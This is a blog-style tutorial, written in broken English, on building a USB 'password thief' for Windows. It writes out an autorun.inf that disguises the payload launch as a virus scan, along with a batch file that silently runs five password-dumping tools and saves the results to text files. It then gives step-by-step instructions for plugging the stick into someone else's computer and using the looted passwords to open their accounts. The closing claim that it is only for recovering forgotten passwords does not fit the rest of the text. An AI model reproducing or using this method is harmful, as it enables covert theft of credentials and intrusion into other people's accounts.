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Hacking pasword ( Windows )

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Often heard that people want to know the password to another person for any account and if it can be the result it wanted in use for what? The author also do not know, all that we return to one's personal. but here we just want to share a trick (still using the Help Software) to obtain the username + password are correct. basically a way (softwares) is used to detect the password is forgotten by the owner, because the windows are always doing the storage of the username and password combination that had been used to log in through the windows.


Okay. now it's time to show the softwares :
  1. mspass.exe
  2. mailpv.exe
  3. iepv.exe
  4. pspv.exe
  5. passwordfox.exe
The softwares above has a target that is not the same course,

  1. To detect the password you use on Instant Messenger 
  2. password that is used to detect mail password
  3. To find your password that was used on the Internet Explorer Browser
  4. To read the password used to lock Folder
  5. To read all the password ever entered in Firefox Browser

Click to download the software titles above and run on the target computer.
software - the software can be used for hacking by running it in an auto from a FlashDisk
steps are:

  1. open notepad and type the following script "[autorun] open=launch.bat ACTION= Perform a Virus Scan" save and rename it to autorun.inf and send it to a flash
  2. open again  notepad and type the following command code " start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt " save it and rename it as launch.bat then send to flash 
  3. grab the file with extension. exe from all the software above and send it to flash.
of the 3 steps above flashdish Thief password for windows has finished and ready for use.
now is a step Theft password:

  1. Plug the flash that has been made ​​earlier to the target computer, so it will auto pop up
  2. in the pop up select the first option (perform a virus scan)
  3. thus to-5 software will run automatically and "silent - silent" (his name is also a thief pack)
  4. wait a few minutes (do not rush - rush) because the longer the more password obtained
  5. This process will not be known by another user directly, meaning that even if we leave the origin flash is not removed from the target computer is not a problem
  6. after a few minutes uninstall flasdisk from the target computer and open it in your own computer
  7. there will be file.txt, stored in many earlier looted and password can use to open another person's account.
Note: This method can be applied to all versions of windows
Once again these tips actually just to get the password is forgotten by their owners and not to loot the password to others, hopefully you can be more wise in using it
may be useful